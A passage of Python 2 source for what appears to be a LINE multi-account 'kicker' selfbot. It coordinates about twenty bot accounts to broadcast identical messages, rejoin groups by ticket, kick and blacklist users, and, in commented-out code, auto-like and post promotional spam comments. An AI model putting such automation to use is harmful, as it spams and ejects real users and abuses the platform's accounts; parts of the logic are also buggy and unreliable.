ki9.sendText(msg.to,(bctxt))
ki10.sendText(msg.to,(bctxt))
ki11.sendText(msg.to,(bctxt))
ki12.sendText(msg.to,(bctxt))
ki13.sendText(msg.to,(bctxt))
ki14.sendText(msg.to,(bctxt))
ki15.sendText(msg.to,(bctxt))
ki16.sendText(msg.to,(bctxt))
ki17.sendText(msg.to,(bctxt))
ki18.sendText(msg.to,(bctxt))
ki19.sendText(msg.to,(bctxt))
ki20.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
ki3.sendText(msg.to,"Ping ")
ki4.sendText(msg.to,"Ping ")
ki5.sendText(msg.to,"Ping ")
ki6.sendText(msg.to,"Ping ")
ki7.sendText(msg.to,"Ping ")
ki8.sendText(msg.to,"Ping ")
ki9.sendText(msg.to,"Ping ")
ki10.sendText(msg.to,"Ping ")
ki11.sendText(msg.to,"Ping ")
ki12.sendText(msg.to,"Ping ")
ki13.sendText(msg.to,"Ping ")
ki14.sendText(msg.to,"Ping ")
ki15.sendText(msg.to,"Ping ")
ki16.sendText(msg.to,"Ping ")
ki17.sendText(msg.to,"Ping ")
ki18.sendText(msg.to,"Ping ")
ki19.sendText(msg.to,"Ping ??")
ki20.sendText(msg.to,"Ping ")
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in ki6mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki7mid:
if op.param2 in ki6mid:
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = False
ki6.updateGroup(G)
Ticket = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(G)
else:
G = ki6.getGroup(op.param1)
ki6.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki6.updateGroup(G)
Ticket = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(G)
elif op.param3 in ki8mid:
if op.param2 in ki7mid:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
else:
G = ki7.getGroup(op.param1)
ki7.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
elif op.param3 in ki9mid:
if op.param2 in ki8mid:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(G)
else:
G = ki8.getGroup(op.param1)
ki8.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(G)
elif op.param3 in ki10mid:
if op.param2 in ki9mid:
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = False
ki9.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(G)
else:
G = ki9.getGroup(op.param1)
ki9.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki9.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(G)
except:
pass
if op.type == 17:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
cl.sendText(op.param1,"Hallo " + cl.getContact(op.param2).displayName + "\nWelcome To ☞ " + str(ginfo.name) + " ☜" + "\nBudayakan Cek Note\nDan Semoga Betah Disini ^_^")
cl.sendImageWithURL(op.param1,image)
print "MEMBER JOIN TO GROUP"
if op.type == 17:
if wait["joinkick"] == True:
if op.param2 in admin:
if op.param2 in Bots:
return
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
print "MEMBER JOIN KICK TO GROUP"
if op.type == 15:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
cl.sendText(op.param1,"Good Bye " + cl.getContact(op.param2).displayName + "\nSee You Next Time . . . (p′︵‵。) 🤗")
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
print "MEMBER HAS LEFT THE GROUP"
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n-> " + Nama
wait2['ROM'][op.param1][op.param2] = "-> " + Nama
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
#def autolike():
# for zx in range(0,50):
# hasil = cl.activity(limit=1000)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~cybertk")
# ki4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki4.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki5.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki6.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki6.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki7.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki7.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
